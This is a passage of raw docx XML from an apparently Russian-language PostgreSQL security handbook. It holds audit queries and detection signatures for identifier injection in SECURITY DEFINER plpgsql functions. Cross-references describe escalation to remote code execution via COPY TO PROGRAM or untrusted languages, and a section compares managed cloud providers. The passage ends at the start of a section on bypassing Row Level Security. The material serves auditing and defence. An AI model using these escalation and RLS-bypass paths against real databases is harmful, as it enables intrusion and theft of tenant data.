      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # SD-функции с EXECUTE без format(%I)</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n.nspname, p.proname FROM pg_proc p</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    WHERE p.prosecdef = true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND p.prosrc ~ '\\bEXECUTE\\b'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND p.prosrc !~ '\\bformat\\s*\\(.*%I'</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SD-функции без SET search_path</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n.nspname, p.proname FROM pg_proc p</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    WHERE p.prosecdef = true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND p.proconfig IS NULL</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Функции с || в EXECUTE без USING</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n.nspname, p.proname FROM pg_proc p</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    WHERE p.prosrc ~ '\\bEXECUTE\\s.*\\|\\|'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND p.prosrc !~ '\\bUSING\\b'</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IDENTIFIER_INJECTION_SIGNATURES = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # runtime: PG-сторона</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "syntax error at or near \"\\$1\"",   # попытка USING для identifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "relation \".*\" does not exist",     # failed identifier injection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IDENTIFIER_INJECTION_RISK = 9   # critical — direct RCE channel в SD-функциях</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эти rules ловят statically-detectable шаблоны при code-review и runtime через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audit-queries. SECURITY DEFINER cross-check — обязательный шаг любого аудита plpgsql-кодбазы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Перекрёстные ссылки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 Stacked queries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — payload в 3.16.1/3.16.4 — это classic stacked-injection. Граница: 3.5 — Wire Protocol; 3.16 — внутри plpgsql EXECUTE (всегда multi-statement).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3.14.2 ORDER BY column_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — application-side analog identifier-injection.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3.14.4 ORDER BY (CASE WHEN)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параллельный класс injection в SQL clauses, не identifier.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parallel class privilege escalation в SD-функциях. Граница: 3.13.6 — name resolution через pg_temp; 3.16.5 — text injection в EXECUTE.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 PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — finale RCE для 3.16.5 (под superuser-owned SD-функцией).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 plperlu, 3.7.3 plpython3u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — альтернативные RCE-пути через 3.16.5.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 UNION-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — канал extraction для 3.16.4 Variant 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3.15.2 to_tsquery operators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параллельный класс semantic-injection (operator-language vs identifier-position).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5.1 Параметризованные запросы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общая reference; 3.16 показывает её </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">серверную сторону</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (USING в plpgsql).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5.2 quote_ident, quote_literal, format('%I')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — сводная reference по защитным функциям.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снижение severity 3.16.5 через ограничение privileges owner-ов SD-функций.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Managed-провайдеры (RDS, Cloud SQL, Supabase)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все пять подразделов 3.16 — application/database-developer-уровень, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не зависят от cloud-provider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AWS RDS / Aurora PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: одинаковое поведение.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(RDS-аналог superuser) может быть owner-ом SD-функций → 3.16.5 эскалирует до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что в RDS = full DB-control (но НЕ хост-OS — RDS изолирует filesystem от user-code; COPY TO PROGRAM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">заблокирован</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на managed RDS).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Google Cloud SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: то же;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ограничен от COPY TO PROGRAM. 3.16.5 RCE-vector урезан до DB-level, но privilege escalation внутри DB полная.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Supabase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: PostgreSQL exposed через PostgREST; функции с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массово используются для RLS-bypass паттернов (см. 3.17.5). Identifier-injection в Supabase-функциях = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">direct RCE within DB context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. COPY TO PROGRAM аналогично заблокирован у supabase_admin.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Azure Database for PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: то же; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">azure_pg_admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет ограничения на OS-level операции.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key provider-difference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: COPY TO PROGRAM и file-system extension (3.6.3/3.6.4) обычно отключены на managed provider даже под их «superuser»-equivalent роли. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">снижает 3.16.5 RCE-severity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на managed installations: вместо OS-RCE атакующий получает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DB-superuser-equivalent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, что всё равно открывает всё application-data, но не позволяет hyperscale-побег на host. Self-hosted PostgreSQL под обычным superuser — полная OS-RCE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для defence-in-depth на managed providers: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RDS Performance Insights / Cloud SQL Insights</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — runtime-monitoring необычных DDL от non-DBA caller-ов.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pgAudit extension</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (доступна на всех major providers) — детальный log SECURITY DEFINER calls.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через scheduled task — статический check регулярных функций.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.17.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RLS (Row Level Security)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — механизм PostgreSQL для фильтрации строк на уровне таблицы по политикам (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE POLICY</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ALTER TABLE t ENABLE ROW LEVEL SECURITY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> каждый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на таблицу автоматически фильтруется по политикам, привязанным к current_user. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">многотенантный изолятор данных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стандартный паттерн для SaaS, где разные tenant-ы делят одну таблицу с фильтрацией по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_id = current_setting('app.tenant_id')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или подобному.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.17 покрывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">обходы RLS через injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — шесть механик, каждая из которых даёт атакующему чтение/запись чужих строк, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">обходя CREATE POLICY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Четыре из них якорятся на конкретные CVE (R9 / R11 / R8 / R26), две — на documented PostgreSQL behavior без CVE (3.17.0 обзор, 3.17.5 SECURITY DEFINER pattern).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Базовая модель RLS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Стандартный multi-tenant setup:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER TABLE app.orders ENABLE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CREATE POLICY tenant_isolation ON app.orders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (tenant_id = current_setting('app.tenant_id')::int);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Per-request приложение делает:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET app.tenant_id = '42';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM app.orders;  -- автоматически WHERE tenant_id = 42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE POLICY ... USING (expr)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
